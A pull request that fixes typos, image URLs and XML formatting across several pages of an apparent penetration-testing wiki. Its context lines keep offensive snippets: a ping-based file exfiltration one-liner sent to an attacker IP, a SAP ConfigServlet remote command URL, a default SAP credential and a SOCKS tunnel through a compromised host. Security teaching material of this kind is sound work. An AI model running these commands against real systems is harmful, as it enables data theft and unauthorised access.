### PR TITLE
Fix multiple typos and fix some images/formatting on pentesting-sap

### DIFF
--- a/exfiltration.md
+++ b/exfiltration.md
@@ -195,7 +195,7 @@ thanks to **@BinaryShadow\_**
 ```bash
 #In order to exfiltrate the content of a file via pings you can do:
 xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
-#This will 4bytes per ping packet (you could probablie increase this until 16)
+#This will 4bytes per ping packet (you could probably increase this until 16)
 ```
 
 ```python

--- a/linux-unix/linux-environment-variables.md
+++ b/linux-unix/linux-environment-variables.md
@@ -4,7 +4,7 @@
 
 The **global variables **will be** inherited **by **child processes**.
 
-You can create a Global variable for your current session doing:
+You can create a global variable for your current session doing:
 
 ```bash
 export MYGLOBAL="hello world"
@@ -136,6 +136,6 @@ One, two and three backgrounded jobs:
 
 ![](<../.gitbook/assets/image (89).png>)
 
-One background job, one stopped and last command dind't finish correctly:
+One background job, one stopped and last command didn't finish correctly:
 
 ![](<../.gitbook/assets/image (90).png>)

--- a/pentesting-web/2fa-bypass.md
+++ b/pentesting-web/2fa-bypass.md
@@ -29,7 +29,7 @@ Check if a **mail **is sent with a **link **to **reset the password** and if you
 
 ### OAuth
 
-If you can compromise the account of the user in a trusted **OAuth **platform(Google, Facebook...)
+If you can compromise the account of the user in a trusted **OAuth** platform (Google, Facebook...)
 
 ### Brute force
 

--- a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md
+++ b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md
@@ -23,24 +23,24 @@ Listing **processes**, if you find the string "**jdwk**" inside a **java process
 
 ### **Java Debug Wire Protocol**
 
-**Java Platform Debug Architecture (JPDA)**JDWP is one component of the global Java debugging system, called the Java Platform Debug Architecture (JPDA)\[2]. The following is a diagram of the overall architecture:
+**Java Platform Debug Architecture (JPDA)**: JDWP is one component of the global Java debugging system, called the Java Platform Debug Architecture (JPDA)\[2]. The following is a diagram of the overall architecture:
 
- [![](https://ioactive.com/wp-content/uploads/2014/04/jdpa.png)](https://ioactive.com/wp-content/uploads/2014/04/jdpa-1.png)
+[![](https://ioactive.com/wp-content/uploads/2014/04/jdpa.png)](https://ioactive.com/wp-content/uploads/2014/04/jdpa-1.png)
 
-  The Debuggee consists of a multi-threaded JVM running our target application. In order to be remotely debuggable, the JVM instance must be explicitly started with the option -Xdebug passed on the command line, as well as the option -Xrunjdwp (or -agentlib). For example, starting a Tomcat server with remote debugging enabled would look like this:
+The Debuggee consists of a multi-threaded JVM running our target application. In order to be remotely debuggable, the JVM instance must be explicitly started with the option -Xdebug passed on the command line, as well as the option -Xrunjdwp (or -agentlib). For example, starting a Tomcat server with remote debugging enabled would look like this:
 
- [![](https://ioactive.com/wp-content/uploads/2014/04/tomat.png)](https://ioactive.com/wp-content/uploads/2014/04/tomat-1.png)
+[![](https://ioactive.com/wp-content/uploads/2014/04/tomat.png)](https://ioactive.com/wp-content/uploads/2014/04/tomat-1.png)
 
- As shown in the architecture diagram, the Java Debug Wire Protocol is the central link between the Debugger and the JVM instance. Observations about the protocol include:
+As shown in the architecture diagram, the Java Debug Wire Protocol is the central link between the Debugger and the JVM instance. Observations about the protocol include:
 
 * It is a packet-based network binary protocol.
 * It is mostly synchronous. The debugger sends a command over JDWP and expects to receive a reply. However, some commands, like Events, do not expect a synchronous response. They will send a reply when specific conditions are met. For example, a BreakPoint is an Event.
 * It does not use authentication.
 * It does not use encryption.
 
- All of these observations make total sense since we are talking about a debugging protocol. However, when such a service is exposed to a hostile network, or is Internet facing, things could go wrong.\
+All of these observations make total sense since we are talking about a debugging protocol. However, when such a service is exposed to a hostile network, or is Internet facing, things could go wrong.\
 \
-**Handshake**JDWP dictates\[9] that communication must be initiated by a simple handshake. Upon successful TCP connection, the Debugger (client) sends the 14-character ASCII string “JDWP-Handshake”. The Debuggee (server) responds to this message by sending the exact same string.  The following scapy\[3] trace shows the initial two-way handshake:
+**Handshake**: JDWP dictates\[9] that communication must be initiated by a simple handshake. Upon successful TCP connection, the Debugger (client) sends the 14-character ASCII string “JDWP-Handshake”. The Debuggee (server) responds to this message by sending the exact same string.  The following scapy\[3] trace shows the initial two-way handshake:
 
  root:\~/tools/scapy-hg # ip addr show dev eth0 | grep “inet “    inet 192.168.2.2/24 brd 192.168.2.255 scope global eth0root:\~/tools/scapy-hg # ./run_scapy
 
@@ -61,7 +61,7 @@ Listing **processes**, if you find the string "**jdwk**" inside a **java process
 
 An experienced security auditor may have already realised that such a simple handshake offers a way to easily uncover live JDWP services on the Internet. Just send one simple probe and check for the specific response.  More interestingly, a behavior was observed on the IBM Java Development Kit when scanning with ShodanHQ\[4] with the server “talking” first with the very same banner mentioned. As a consequence, there is a totally passive way to discover an active JDWP service (this is covered later on in this article with the help of the (in)famous Shodan).\
 \
-**Communication**JDWP defines messages\[10] involved in communications between the Debugger and the Debuggee.  The messages follow a simple structure, defined as follows: [![](https://ioactive.com/wp-content/uploads/2014/04/createstring.png)](https://ioactive.com/wp-content/uploads/2014/04/createstring-1.png)
+**Communication**: JDWP defines messages\[10] involved in communications between the Debugger and the Debuggee.  The messages follow a simple structure, defined as follows: [![](https://ioactive.com/wp-content/uploads/2014/04/createstring.png)](https://ioactive.com/wp-content/uploads/2014/04/createstring-1.png)
 
  The Length and Id fields are rather self explanatory. The Flag field is only used to distinguish request packets from replies, a value of 0x80 indicating a reply packet. The CommandSet field defines the category of the Command as shown in the following table. \
 \
@@ -73,7 +73,7 @@ An experienced security auditor may have already realised that such a simple han
 | 0x40–0x7F      |    Provide event information to the debugger (e.g. the JVM has       hit a BreakPoint and is waiting for further actions) |
 | 0x80           |    Third-party extensions                                                                                                 |
 
- Keeping in mind that we want to execute arbitrary code, the following commands are the most interesting for our purposes.
+Keeping in mind that we want to execute arbitrary code, the following commands are the most interesting for our purposes.
 
 * VirtualMachine/IDSizes defines the size of the data structures handled by the JVM. This is one of the reasons why the nmap script jdwp-exec.nse\[11] does not work, since the script uses hardcoded sizes.
 * ClassType/InvokeMethod allows you to invoke a static function.
@@ -81,7 +81,7 @@ An experienced security auditor may have already realised that such a simple han
 * StackFrame/(Get|Set)Values provides pushing/popping capabilities from threads stack.
 * Event/Composite forces the JVM to react to specific behaviors declared by this command. This command is a major key for debugging purposes as it allows, among many other things, setting breakpoints, single-stepping through the threads during runtime, and being notified when accessing/modifying values in the exact same manner as GDB or WinDBG.
 
- Not only does JDWP allow you to access and invoke objects already residing in memory, it also allows you to create or overwrite data.
+Not only does JDWP allow you to access and invoke objects already residing in memory, it also allows you to create or overwrite data.
 
 * VirtualMachine/CreateString allows  you to transform a string into a java.lang.String living in the JVM runtime.
 * VirtualMachine/RedefineClasses allows you to install new class definitions.

--- a/pentesting/pentesting-sap.md
+++ b/pentesting/pentesting-sap.md
@@ -34,7 +34,7 @@ https://www.shodan.io/search?query=SAP+J2EE+Engine
 
 * Here is what [http://SAP:50000/irj/portal](http://sap:50000/irj/portal) looks like
 
-![alt text](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
+![SAP Logon screen](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
 
 * Use nmap to check for open ports and known services \(sap routers, webdnypro, web services, web servers, etc.\)
 * Crawl the URLs if there is a web server running.
@@ -122,7 +122,13 @@ BWDEVELOPER:Down1oad:001
 ```
 
 * Run Wireshark then authenticate to the client \(SAP GUI\) using the credentials you got because some clients transmit credentials without SSL. There are two known plugins for Wireshark that can dissect the main headers used by the SAP DIAG protocol too: SecureAuth Labs SAP dissection plug-in and SAP DIAG plugin by Positive Research Center.
-* Check for privilege escalations like using some SAP Transaction Codes \(tcodes\) for low-privilege users: SU01 - To create and maintain the users SU01D - To Display Users SU10 - For mass maintenance SU02 - For Manual creation of profiles SM19 - Security audit - configuration SE84 - Information System for SAP R/3 Authorizations
+* Check for privilege escalations like using some SAP Transaction Codes \(tcodes\) for low-privilege users:
+  * SU01 - To create and maintain the users
+  * SU01D - To Display Users
+  * SU10 - For mass maintenance
+  * SU02 - For Manual creation of profiles
+  * SM19 - Security audit - configuration
+  * SE84 - Information System for SAP R/3 Authorizations
 * Check if you can execute system commands / run scripts in the client.
 * Check if you can do XSS on BAPI Explorer
 
@@ -131,7 +137,7 @@ BWDEVELOPER:Down1oad:001
 * Crawl the URLs \(see discovery phase\).
 * Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like:
 
-![alt text](https://github.com/shipcod3/mySapAdventures/blob/master/screengrabs/index.jpeg)
+![SAP Index Page](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg)
 
 * Look for common web vulnerabilities \(Refer to OWASP Top 10\) because there are XSS, RCE, XXE, etc. vulnerabilities in some places.
 * Check out Jason Haddix’s [“The Bug Hunters Methodology”](https://github.com/jhaddix/tbhm) for testing web vulnerabilities.
@@ -139,40 +145,39 @@ BWDEVELOPER:Down1oad:001
 * Open `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` then hit the “Choose” Button and then in the opened window press “Search”. You should be able to see a list of SAP users \(Vulnerability Reference: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/) \)
 * Are the credentials submitted over HTTP? If it is then it is considered as P3 based on Bugcrowd’s [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy): Broken Authentication and Session Management \| Weak Login Function Over HTTP. Hint: Check out [http://SAP:50000/startPage](http://sap:50000/startPage) too or the logon portals :\)
 
-![alt text](https://github.com/shipcod3/mySapAdventures/blob/master/screengrabs/startPage.jpeg)
+![SAP Start Page](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg)
 
 * Try `/irj/go/km/navigation/` for possible directory listing or authentication bypass
 * [http://SAP/sap/public/info](http://sap/sap/public/info) contains some juicy information:
 
-```text
-This XML file does not appear to have any style information associated with it. The document tree is shown below.
+```xml
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
-<SOAP-ENV:Body>
-<rfc:RFC_SYSTEM_INFO.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions">
-<RFCSI>
-<RFCPROTO>011</RFCPROTO>
-<RFCCHARTYP>4102</RFCCHARTYP>
-<RFCINTTYP>BIG</RFCINTTYP>
-<RFCFLOTYP>IE3</RFCFLOTYP>
-<RFCDEST>randomnum</RFCDEST>
-<RFCHOST>randomnum</RFCHOST>
-<RFCSYSID>BRQ</RFCSYSID>
-<RFCDATABS>BRQ</RFCDATABS>
-<RFCDBHOST>randomnum</RFCDBHOST>
-<RFCDBSYS>ORACLE</RFCDBSYS>
-<RFCSAPRL>740</RFCSAPRL>
-<RFCMACH>324</RFCMACH>
-<RFCOPSYS>AIX</RFCOPSYS>
-<RFCTZONE>-25200</RFCTZONE>
-<RFCDAYST/>
-<RFCIPADDR>192.168.1.8</RFCIPADDR>
-<RFCKERNRL>749</RFCKERNRL>
-<RFCHOST2>randomnum</RFCHOST2>
-<RFCSI_RESV/>
-<RFCIPV6ADDR>192.168.1.8</RFCIPV6ADDR>
-</RFCSI>
-</rfc:RFC_SYSTEM_INFO.Response>
-</SOAP-ENV:Body>
+	<SOAP-ENV:Body>
+		<rfc:RFC_SYSTEM_INFO.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions">
+			<RFCSI>
+				<RFCPROTO>011</RFCPROTO>
+				<RFCCHARTYP>4102</RFCCHARTYP>
+				<RFCINTTYP>BIG</RFCINTTYP>
+				<RFCFLOTYP>IE3</RFCFLOTYP>
+				<RFCDEST>randomnum</RFCDEST>
+				<RFCHOST>randomnum</RFCHOST>
+				<RFCSYSID>BRQ</RFCSYSID>
+				<RFCDATABS>BRQ</RFCDATABS>
+				<RFCDBHOST>randomnum</RFCDBHOST>
+				<RFCDBSYS>ORACLE</RFCDBSYS>
+				<RFCSAPRL>740</RFCSAPRL>
+				<RFCMACH>324</RFCMACH>
+				<RFCOPSYS>AIX</RFCOPSYS>
+				<RFCTZONE>-25200</RFCTZONE>
+				<RFCDAYST/>
+				<RFCIPADDR>192.168.1.8</RFCIPADDR>
+				<RFCKERNRL>749</RFCKERNRL>
+				<RFCHOST2>randomnum</RFCHOST2>
+				<RFCSI_RESV/>
+				<RFCIPV6ADDR>192.168.1.8</RFCIPV6ADDR>
+			</RFCSI>
+		</rfc:RFC_SYSTEM_INFO.Response>
+	</SOAP-ENV:Body>
 </SOAP-ENV:Envelope>
 ```
 
@@ -252,7 +257,7 @@ Matching Modules
 http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a
 ```
 
-![alt text](https://github.com/shipcod3/mySapAdventures/blob/master/screengrabs/sap_rce.jpeg)
+![SAP Config Servlet RCE](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap_rce.jpeg)
 
 * Before running the `start` command on the bizploit script at the Discovery phase, you can also add the following for performing vulnerability assessment:
 

--- a/physical-attacks/physical-attacks.md
+++ b/physical-attacks/physical-attacks.md
@@ -111,8 +111,8 @@ With administrators privileges and powershell you could make a copy of the SAM f
 
 Bitlocker uses **2 passwords**. The one used by the **user**, and the **recovery** password \(48 digits\).
 
-If you are lucky and inside the current session of Windows exists the file _**C:\Windows\MEMORY.DMP**_ \(It is a memory dump\) you could try to **search inside of it the recovery password**. You can **get this file** and a **copy of the filesytem** and then use _Elcomsoft Forensic Disk Dercyptor_ to get the content \(this will only work if the password is inside the memory dump\).  
-You coud also **force the memory dump** using _**NotMyFault**_ of _Sysinternals,_ but this will reboot the system and has to be executed as Administrator.
+If you are lucky and inside the current session of Windows exists the file _**C:\Windows\MEMORY.DMP**_ \(It is a memory dump\) you could try to **search inside of it the recovery password**. You can **get this file** and a **copy of the filesytem** and then use _Elcomsoft Forensic Disk Decryptor_ to get the content \(this will only work if the password is inside the memory dump\).
+You could also **force the memory dump** using _**NotMyFault**_ of _Sysinternals,_ but this will reboot the system and has to be executed as Administrator.
 
 You could also try a **bruteforce attack** using _**Passware Kit Forensic**_.
 

--- a/tunneling-and-port-forwarding.md
+++ b/tunneling-and-port-forwarding.md
@@ -32,7 +32,7 @@ sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised>
 
 ### Port2hostnet \(proxychains\)
 
-Local Port --&gt; Compromised host\(SSH\) --&gt; Wherever
+Local Port --&gt; Compromised host \(SSH\) --&gt; Wherever
 
 ```bash
 ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)


### PR DESCRIPTION
 - Fix multiple smaller typos
 - pentesting-sap: Replace Github image links with the correct raw URL in
   order to render them correctly. Also replace the alt text to a more
   accurate description and format an XML answer as correct XML to better
   display it.